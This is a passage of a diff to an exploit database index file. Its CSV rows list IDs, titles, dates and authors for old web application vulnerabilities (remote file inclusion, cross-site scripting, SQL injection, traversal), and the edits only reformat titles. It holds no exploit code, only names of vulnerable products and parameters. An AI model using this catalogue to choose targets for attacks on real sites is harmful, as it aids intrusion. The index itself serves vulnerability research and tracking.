Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28354,platforms/php/webapps/28354.txt,"VWar 1.5 - 'joinus.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28355,platforms/php/webapps/28355.txt,"VWar 1.5 - 'news.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 +28356,platforms/php/webapps/28356.txt,"VWar 1.5 - 'stats.php?vwar_root' Remote File Inclusion",2006-08-07,AG-Spider,php,webapps,0 28359,platforms/php/webapps/28359.txt,"phpPrintAnalyzer 1.1 - 'index.php' Remote File Inclusion",2006-08-07,sh3ll,php,webapps,0 28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0 28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,php,webapps,0 @@ -30452,7 +30453,7 @@ id,file,description,date,author,platform,type,port 28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - 'MyBloggie_Root_Path' Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0 28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - 'Big.php' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0 -28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusions",2006-08-10,x0r0n,php,webapps,0 +28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - 'Image' Multiple Remote File Inclusions",2006-08-10,x0r0n,php,webapps,0 28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0 28378,platforms/php/webapps/28378.txt,"miniBloggie 1.0 - 'Fname' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0 28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - 'Install3.php' Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0 @@ -30471,13 +30472,13 @@ id,file,description,date,author,platform,type,port 28406,platforms/php/webapps/28406.txt,"XennoBB 1.0.x/2.2 - Icon_Topic SQL Injection",2006-08-19,"Chris Boulton",php,webapps,0 28409,platforms/php/webapps/28409.txt,"vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection",2013-09-20,"High-Tech Bridge SA",php,webapps,0 28410,platforms/php/webapps/28410.txt,"Mambo Component Display MOSBot Manager - 'MosConfig_absolute_path' Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 -28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - Forgot.php Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 +28411,platforms/php/webapps/28411.txt,"DieselScripts Job Site - 'Forgot.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-21,night_warrior771,php,webapps,0 28412,platforms/php/webapps/28412.txt,"DieselScripts DieselPay - 'index.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 -28413,platforms/php/webapps/28413.txt,"cPanel 10.x - dohtaccess.html dir Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 -28414,platforms/php/webapps/28414.txt,"cPanel 10.x - 'editit.html' File Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 -28415,platforms/php/webapps/28415.txt,"cPanel 10.x - 'showfile.html' File Parameter Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 +28413,platforms/php/webapps/28413.txt,"cPanel 10.x - 'dohtaccess.html?dir' Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 +28414,platforms/php/webapps/28414.txt,"cPanel 10.x - 'editit.html?File' Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 +28415,platforms/php/webapps/28415.txt,"cPanel 10.x - 'showfile.html?File' Cross-Site Scripting",2006-08-21,preth00nker,php,webapps,0 28416,platforms/php/webapps/28416.txt,"Mambo Component EstateAgent 1.0.2 - MosConfig_absolute_path Remote File Inclusion",2006-08-21,O.U.T.L.A.W,php,webapps,0 -28417,platforms/php/webapps/28417.txt,"ToendaCMS 0.x/1.0.x - TCMS_Administer Parameter Remote File Inclusion",2006-08-21,You_You,php,webapps,0 +28417,platforms/php/webapps/28417.txt,"ToendaCMS 0.x/1.0.x - 'TCMS_Administer' Remote File Inclusion",2006-08-21,You_You,php,webapps,0 28418,platforms/php/webapps/28418.txt,"PHProjekt Content Management Module 0.6.1 - Multiple Remote File Inclusions",2006-08-21,"the master",php,webapps,0 28419,platforms/php/webapps/28419.txt,"DieselScripts Smart Traffic - 'index.php' Remote File Inclusion",2006-08-21,night_warrior771,php,webapps,0 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail - 'Getad.php' Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0 @@ -30501,12 +30502,12 @@ id,file,description,date,author,platform,type,port 28444,platforms/php/webapps/28444.txt,"Alstrasoft Template Seller - 'Config[Template_Path]' Multiple Remote File Inclusions",2006-08-30,night_warrior771,php,webapps,0 28446,platforms/php/webapps/28446.txt,"HLstats 1.34 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps,0 28447,platforms/php/webapps/28447.php,"osCommerce 2.1/2.2 - 'product_info.php' SQL Injection",2006-08-30,"James Bercegay",php,webapps,0 -28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 - '/admin/newsletters.php' page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 +28749,platforms/php/webapps/28749.txt,"osCommerce 2.2 - '/admin/newsletters.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - '/admin/orders_status.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - '/admin/products_attributes.php?page' Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28464,platforms/php/webapps/28464.txt,"VisualShapers EZContents 2.0.3 - 'Headeruserdata.php' SQL Injection",2006-08-30,DarkFig,php,webapps,0 28465,platforms/php/webapps/28465.txt,"VisualShapers EZContents 2.0.3 - 'Loginreq2.php' Cross-Site Scripting",2006-08-30,DarkFig,php,webapps,0 -28466,platforms/php/webapps/28466.txt,"Learn.com - Learncenter.asp Cross-Site Scripting",2006-08-30,Crack_MaN,php,webapps,0 +28466,platforms/php/webapps/28466.txt,"Learn.com - 'Learncenter.asp' Cross-Site Scripting",2006-08-30,Crack_MaN,php,webapps,0 28467,platforms/php/webapps/28467.txt,"ExBB 1.9.1 - 'Home_Path' Multiple Remote File Inclusions",2006-08-31,Matdhule,php,webapps,0 28468,platforms/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Inclusions",2006-09-01,MATASANOS,php,webapps,0 28452,platforms/php/webapps/28452.txt,"WordPress Plugin Lazy SEO 1.1.9 - Arbitrary File Upload",2013-09-22,"Ashiyane Digital Security Team",php,webapps,0 @@ -30515,7 +30516,7 @@ id,file,description,date,author,platform,type,port 28455,platforms/php/webapps/28455.txt,"EZContents 2.0 - 'gallery_summary.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28456,platforms/php/webapps/28456.txt,"EZContents 2.0.3 - 'showguestbook.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28457,platforms/php/webapps/28457.txt,"EZContents 2.0.3 - 'showlinks.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28458,platforms/php/webapps/28458.txt,"EZContents 2.0.3 - 'shownews.php' GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28458,platforms/php/webapps/28458.txt,"EZContents 2.0.3 - 'shownews.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28459,platforms/php/webapps/28459.txt,"EZContents 2.0.3 - 'showpoll.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28460,platforms/php/webapps/28460.txt,"EZContents 2.0.3 - 'review_summary.php?GLOBALS[admin_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28461,platforms/php/webapps/28461.txt,"EZContents 2.0.3 - 'search.php?GLOBALS[language_home]' Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 @@ -30528,7 +30529,7 @@ id,file,description,date,author,platform,type,port 28486,platforms/php/webapps/28486.txt,"In-portal In-Link 2.3.4 - 'ADODB_DIR.php' Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 28487,platforms/php/webapps/28487.txt,"PHP-Nuke MyHeadlines 4.3.1 Module - Cross-Site Scripting",2006-09-04,"Thomas Pollet",php,webapps,0 28488,platforms/php/webapps/28488.php,"PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion",2006-09-04,Kacper,php,webapps,0 -28490,platforms/php/webapps/28490.txt,"SoftBB 0.1 - Page Parameter Cross-Site Scripting",2006-09-05,ThE__LeO,php,webapps,0 +28490,platforms/php/webapps/28490.txt,"SoftBB 0.1 - 'Page' Cross-Site Scripting",2006-09-05,ThE__LeO,php,webapps,0 28492,platforms/php/webapps/28492.txt,"Uni-vert PHPLeague 0.82 - 'Joueurs.php' SQL Injection",2006-09-06,DrEiNsTeIn,php,webapps,0 28493,platforms/php/webapps/28493.txt,"PHP-Nuke Book Catalog Module 1.0 - 'upload.php' Arbitrary File Upload",2006-09-07,osm,php,webapps,0 28494,platforms/php/webapps/28494.txt,"AckerTodo 4.0 - 'index.php' Cross-Site Scripting",2006-09-07,viz.security,php,webapps,0 @@ -30541,17 +30542,17 @@ id,file,description,date,author,platform,type,port 28503,platforms/php/webapps/28503.txt,"TextAds - 'error.php?error' Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0 28505,platforms/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,php,webapps,0 29215,platforms/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 - 'QB_Path' Multiple Remote File Inclusions",2006-12-27,Shell,php,webapps,0 -28510,platforms/php/webapps/28510.txt,"PHProg 1.0 - 'index.php' album Parameter Cross-Site Scripting",2006-09-11,cdg393,php,webapps,0 -28511,platforms/php/webapps/28511.txt,"PHProg 1.0 - 'index.php' lang Parameter Traversal Arbitrary File Access",2006-09-11,cdg393,php,webapps,0 -28514,platforms/cgi/webapps/28514.txt,"SQL-Ledger 2.6.x/LedgerSMB 1.0 - Terminal Parameter Directory Traversal",2006-09-12,"Chris Murtagh",cgi,webapps,0 +28510,platforms/php/webapps/28510.txt,"PHProg 1.0 - 'index.php?album' Cross-Site Scripting",2006-09-11,cdg393,php,webapps,0 +28511,platforms/php/webapps/28511.txt,"PHProg 1.0 - 'index.php?lang' Traversal Arbitrary File Access",2006-09-11,cdg393,php,webapps,0 +28514,platforms/cgi/webapps/28514.txt,"SQL-Ledger 2.6.x/LedgerSMB 1.0 - 'Terminal' Directory Traversal",2006-09-12,"Chris Murtagh",cgi,webapps,0 28515,platforms/php/webapps/28515.txt,"IDevSpot iSupport 1.8 - 'rightbar.php?suser' Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0 28516,platforms/php/webapps/28516.txt,"IDevSpot iSupport 1.8 - 'open_tickets.php?ticket_id' Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0 -28517,platforms/php/webapps/28517.txt,"IDevSpot iSupport 1.8 - 'index.php' cons_page_title Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0 +28517,platforms/php/webapps/28517.txt,"IDevSpot iSupport 1.8 - 'index.php?cons_page_title' Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0 40377,platforms/linux/webapps/40377.txt,"Open-Xchange Guard 2.4.2 - Multiple Cross-Site Scripting Vulnerabilities",2016-09-13,"Benjamin Daniel Mussler",linux,webapps,0 28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 - 'index.php' Remote File Inclusion",2006-09-12,s3rv3r_hack3r,php,webapps,0 28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - 'print.php' Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0 28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - 'Childwindow.Inc.php' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 -28522,platforms/php/webapps/28522.txt,"Telekorn Signkorn Guestbook 1.x - 'index.php' dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28522,platforms/php/webapps/28522.txt,"Telekorn Signkorn Guestbook 1.x - 'index.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28523,platforms/php/webapps/28523.txt,"Telekorn Signkorn Guestbook 1.x - '/includes/functions.gb.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28524,platforms/php/webapps/28524.txt,"Telekorn Signkorn Guestbook 1.x - '/includes/functions.admin.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28525,platforms/php/webapps/28525.txt,"Telekorn Signkorn Guestbook 1.x - '/includes/admin.inc.php?dir_path' Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 @@ -30594,9 +30595,9 @@ id,file,description,date,author,platform,type,port 28564,platforms/php/webapps/28564.txt,"ArticleSetup - Multiple Vulnerabilities",2013-09-26,DevilScreaM,php,webapps,0 38990,platforms/php/webapps/38990.txt,"ArticleSetup Article Script 1.00 - SQL Injection",2015-12-15,"Linux Zone Research Team",php,webapps,80 28565,platforms/php/webapps/28565.txt,"PHP Event Calendar 1.4/1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,"NR Nandini",php,webapps,0 -28566,platforms/asp/webapps/28566.txt,"Snitz Forums 2000 - forum.asp Cross-Site Scripting",2006-09-13,ajann,asp,webapps,0 +28566,platforms/asp/webapps/28566.txt,"Snitz Forums 2000 - 'forum.asp' Cross-Site Scripting",2006-09-13,ajann,asp,webapps,0 28567,platforms/php/webapps/28567.txt,"NX5Linkx 1.0 - Multiple SQL Injections",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0 -28568,platforms/php/webapps/28568.txt,"NX5Linkx 1.0 - links.php HTTP Response Splitting",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0 +28568,platforms/php/webapps/28568.txt,"NX5Linkx 1.0 - 'links.php' HTTP Response Splitting",2006-09-13,"Aliaksandr Hartsuyeu",php,webapps,0 28569,platforms/php/webapps/28569.txt,"ActiveCampaign KnowledgeBuilder 2.2 - Remote File Inclusion",2006-09-14,igi,php,webapps,0 28570,platforms/cgi/webapps/28570.txt,"Mailman 2.1.x - Multiple Input Validation Vulnerabilities",2006-09-14,"Moritz Naumann",cgi,webapps,0 28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 - '/admin/inc/footer.inc.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-14,"HACKERS PAL",php,webapps,0 @@ -30604,34 +30605,34 @@ id,file,description,date,author,platform,type,port 28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 - 'login.php?Username' SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 28574,platforms/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",php,webapps,0 28575,platforms/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Inclusions",2006-09-14,"Saudi Hackrz",php,webapps,0 -28577,platforms/asp/webapps/28577.txt,"ClickBlog! 2.0 - default.asp SQL Injection",2006-09-14,ajann,asp,webapps,0 +28577,platforms/asp/webapps/28577.txt,"ClickBlog! 2.0 - 'default.asp' SQL Injection",2006-09-14,ajann,asp,webapps,0 28580,platforms/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,php,webapps,0 -28581,platforms/php/webapps/28581.txt,"Jupiter CMS 1.1.4/1.1.5 - galleryuploadfunction.php Arbitrary File Upload",2006-09-15,"HACKERS PAL",php,webapps,0 +28581,platforms/php/webapps/28581.txt,"Jupiter CMS 1.1.4/1.1.5 - 'galleryuploadfunction.php' Arbitrary File Upload",2006-09-15,"HACKERS PAL",php,webapps,0 28582,platforms/php/webapps/28582.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/blocks.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 28583,platforms/php/webapps/28583.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/register.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 28584,platforms/php/webapps/28584.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/mass-email.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 28585,platforms/php/webapps/28585.txt,"Jupiter CMS 1.1.4/1.1.5 - '/modules/search.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-15,"HACKERS PAL",php,webapps,0 28586,platforms/php/webapps/28586.txt,"Jupiter CMS 1.1.4/1.1.5 - modules/register Multiple SQL Injections",2006-09-15,"HACKERS PAL",php,webapps,0 -28587,platforms/asp/webapps/28587.txt,"EasyPage 7 - Default.aspx SQL Injection",2006-09-15,s3rv3r_hack3r,asp,webapps,0 -28589,platforms/asp/webapps/28589.txt,"Web Wiz Forums 7.01 - members.asp Cross-Site Scripting",2006-09-15,Crack_MaN,asp,webapps,0 +28587,platforms/asp/webapps/28587.txt,"EasyPage 7 - 'Default.aspx' SQL Injection",2006-09-15,s3rv3r_hack3r,asp,webapps,0 +28589,platforms/asp/webapps/28589.txt,"Web Wiz Forums 7.01 - 'members.asp' Cross-Site Scripting",2006-09-15,Crack_MaN,asp,webapps,0 28590,platforms/php/webapps/28590.txt,"Hitweb 3.0 - 'REP_CLASS' Multiple Remote File Inclusions",2006-09-16,ERNE,php,webapps,0 28591,platforms/php/webapps/28591.php,"PHP-post Web Forum 0.x.1.0 - 'profile.php' Multiple SQL Injections",2006-09-16,"HACKERS PAL",php,webapps,0 28592,platforms/php/webapps/28592.txt,"PHP-post Web Forum 0.x.1.0 - 'pm.php?replyuser' Cross-Site Scripting",2006-09-16,"HACKERS PAL",php,webapps,0 -28593,platforms/asp/webapps/28593.txt,"ZilekPortal 1.0 - Haberdetay.asp SQL Injection",2006-09-16,chernobiLe,asp,webapps,0 +28593,platforms/asp/webapps/28593.txt,"ZilekPortal 1.0 - 'Haberdetay.asp' SQL Injection",2006-09-16,chernobiLe,asp,webapps,0 28594,platforms/php/webapps/28594.txt,"Artmedic Links 5.0 - 'index.php' Remote File Inclusion",2006-09-16,botan,php,webapps,0 -28597,platforms/asp/webapps/28597.txt,"ECardPro 2.0 - search.asp SQL Injection",2006-09-18,ajann,asp,webapps,0 +28597,platforms/asp/webapps/28597.txt,"ECardPro 2.0 - 'search.asp' SQL Injection",2006-09-18,ajann,asp,webapps,0 28598,platforms/php/webapps/28598.txt,"IDevSpot BizDirectory 1.9 - Multiple Cross-Site Scripting Vulnerabilities",2006-09-18,s3rv3r_hack3r,php,webapps,0 28599,platforms/php/webapps/28599.txt,"NixieAffiliate 1.9 - 'lostpassword.php' Cross-Site Scripting",2006-09-18,s3rv3r_hack3r,php,webapps,0 -28600,platforms/asp/webapps/28600.txt,"EShoppingPro 1.0 - Search_Run.asp SQL Injection",2006-09-18,ajann,asp,webapps,0 +28600,platforms/asp/webapps/28600.txt,"EShoppingPro 1.0 - 'Search_Run.asp' SQL Injection",2006-09-18,ajann,asp,webapps,0 28601,platforms/php/webapps/28601.txt,"PT News 1.7.8 - 'search.php' Cross-Site Scripting",2006-09-18,Snake,php,webapps,0 28603,platforms/php/webapps/28603.txt,"Innovate Portal 2.0 - 'index.php' Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 28604,platforms/php/webapps/28604.txt,"ESyndiCat 1.5 - 'search.php' Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 -28605,platforms/jsp/webapps/28605.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - downloadfile Servlet Traversal Arbitrary File Access",2006-09-20,"Tan Chew Keong",jsp,webapps,0 -28606,platforms/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updatemail Servlet - Arbitrary Mail Message Manipulation",2006-09-20,"Tan Chew Keong",jsp,webapps,0 -28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - addrlist Servlet Multiple SQL Injections",2006-09-20,"Tan Chew Keong",jsp,webapps,0 -28608,platforms/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - maillist Servlet Multiple SQL Injections",2006-09-20,"Tan Chew Keong",jsp,webapps,0 -28609,platforms/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet - in_id Variable Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps,0 -28610,platforms/jsp/webapps/28610.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - updateuser Servlet in_name Parameter Cross-Site Scripting",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28605,platforms/jsp/webapps/28605.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'downloadfile' Servlet Traversal Arbitrary File Access",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28606,platforms/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'updatemail' Servlet Arbitrary Mail Message Manipulation",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'addrlist' Servlet Multiple SQL Injections",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28608,platforms/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'maillist' Servlet Multiple SQL Injections",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28609,platforms/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'updateuser?in_id' Servlet Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28610,platforms/jsp/webapps/28610.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - 'updateuser?in_name' Servlet Cross-Site Scripting",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28611,platforms/php/webapps/28611.txt,"RedBLoG 0.5 - 'imgen.php?Root' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 28612,platforms/php/webapps/28612.txt,"RedBLoG 0.5 - '/admin/config.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 28613,platforms/php/webapps/28613.txt,"RedBLoG 0.5 - 'common.php?root_path' Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0 @@ -30673,17 +30674,17 @@ id,file,description,date,author,platform,type,port 28699,platforms/php/webapps/28699.txt,"CubeCart 3.0.x - '/admin/print_order.php?order_id' Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28652,platforms/hardware/webapps/28652.txt,"Asus RT-N66U 3.0.0.4.374_720 - Cross-Site Request Forgery",2013-09-30,cgcai,hardware,webapps,80 28653,platforms/linux/webapps/28653.txt,"mod_accounting Module 0.5 - Blind SQL Injection",2013-09-30,Wireghoul,linux,webapps,0 -28654,platforms/php/webapps/28654.txt,"XAMPP 1.8.1 - 'lang.php WriteIntoLocalDisk method' Local Write Access",2013-09-30,"Manuel García Cárdenas",php,webapps,80 +28654,platforms/php/webapps/28654.txt,"XAMPP 1.8.1 - 'lang.php?WriteIntoLocalDisk method' Local Write Access",2013-09-30,"Manuel García Cárdenas",php,webapps,80 28656,platforms/php/webapps/28656.txt,"SimpleRisk 20130915-01 - Multiple Vulnerabilities",2013-09-30,"Ryan Dewhurst",php,webapps,80 28661,platforms/php/webapps/28661.txt,"ToendaCMS 1.0.4 - 'Media.php' Directory Traversal",2006-09-24,MoHaJaLi,php,webapps,0 28662,platforms/php/webapps/28662.txt,"Photostore - 'details.php?gid' Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 28663,platforms/php/webapps/28663.txt,"Photostore - 'view_photog.php?photogid' Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 28664,platforms/php/webapps/28664.txt,"Opial AV Download Management 1.0 - 'index.php' Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 -28665,platforms/php/webapps/28665.txt,"WWWThreads 5.4 - Cat Parameter Multiple Cross-Site Scripting Vulnerabilities",2006-09-25,Root3r_H3ll,php,webapps,0 +28665,platforms/php/webapps/28665.txt,"WWWThreads 5.4 - 'Cat' Multiple Cross-Site Scripting Vulnerabilities",2006-09-25,Root3r_H3ll,php,webapps,0 28667,platforms/php/webapps/28667.txt,"BirdBlog 1.x - 'comment.php?entryid' Cross-Site Scripting",2006-09-25,Root3r_H3ll,php,webapps,0 -28668,platforms/php/webapps/28668.txt,"BirdBlog 1.x - 'index.php' page Parameter Cross-Site Scripting",2006-09-25,Root3r_H3ll,php,webapps,0 +28668,platforms/php/webapps/28668.txt,"BirdBlog 1.x - 'index.php?page' Cross-Site Scripting",2006-09-25,Root3r_H3ll,php,webapps,0 28669,platforms/php/webapps/28669.txt,"BirdBlog 1.x - 'user.php?uid' Cross-Site Scripting",2006-09-25,Root3r_H3ll,php,webapps,0 -28670,platforms/php/webapps/28670.txt,"DanPHPSupport 0.5 - 'index.php' page Parameter Cross-Site Scripting",2006-09-25,You_You,php,webapps,0 +28670,platforms/php/webapps/28670.txt,"DanPHPSupport 0.5 - 'index.php?page' Cross-Site Scripting",2006-09-25,You_You,php,webapps,0 28671,platforms/php/webapps/28671.txt,"DanPHPSupport 0.5 - 'admin.php?do' Cross-Site Scripting",2006-09-25,You_You,php,webapps,0 28672,platforms/php/webapps/28672.pl,"BBSNew 2.0.1 - 'index2.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28673,platforms/php/webapps/28673.txt,"Exporia 0.3 - 'Common.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 @@ -30693,10 +30694,10 @@ id,file,description,date,author,platform,type,port 28684,platforms/php/webapps/28684.txt,"Gnew 2013.1 - Multiple Vulnerabilities (2)",2013-10-02,"High-Tech Bridge SA",php,webapps,80 28685,platforms/php/webapps/28685.txt,"GLPI 0.84.1 - Multiple Vulnerabilities",2013-10-02,"High-Tech Bridge SA",php,webapps,0 28686,platforms/php/webapps/28686.txt,"My-BIC 0.6.5 - 'Mybic_Server.php' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 -28687,platforms/php/webapps/28687.txt,"PHP_news 2.0 - 'user_user.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 -28688,platforms/php/webapps/28688.txt,"PHP_news 2.0 - '/admin/news.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 -28689,platforms/php/webapps/28689.txt,"PHP_news 2.0 - '/admin/catagory.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 -28690,platforms/php/webapps/28690.txt,"PHP_news 2.0 - 'creat_news_all.php' language Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28687,platforms/php/webapps/28687.txt,"PHP_news 2.0 - 'user_user.php?language' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28688,platforms/php/webapps/28688.txt,"PHP_news 2.0 - '/admin/news.php?language' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28689,platforms/php/webapps/28689.txt,"PHP_news 2.0 - '/admin/catagory.php?language' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 +28690,platforms/php/webapps/28690.txt,"PHP_news 2.0 - 'creat_news_all.php?language' Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0 28691,platforms/php/webapps/28691.txt,"Quickblogger 1.4 - Remote File Inclusion",2006-09-25,You_You,php,webapps,0 28692,platforms/php/webapps/28692.txt,"Phoenix Evolution CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-26,Root3r_H3ll,php,webapps,0 28693,platforms/php/webapps/28693.txt,"Phoenix Evolution CMS - '/modules/pageedit/index.php?pageid' Cross-Site Scripting",2006-09-26,Root3r_H3ll,php,webapps,0 @@ -30712,7 +30713,7 @@ id,file,description,date,author,platform,type,port 28733,platforms/php/webapps/28733.txt,"Yblog - 'tem.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 28734,platforms/php/webapps/28734.txt,"Yblog - 'uss.php' Cross-Site Scripting",2006-09-30,You_You,php,webapps,0 29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 - SurgeFTPMGR.cgi Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 -29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 - ProductDetails.asp SQL Injection",2006-12-11,ajann,asp,webapps,0 +29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 - 'ProductDetails.asp' SQL Injection",2006-12-11,ajann,asp,webapps,0 28728,platforms/php/webapps/28728.txt,"Geotarget - 'script.php' Remote File 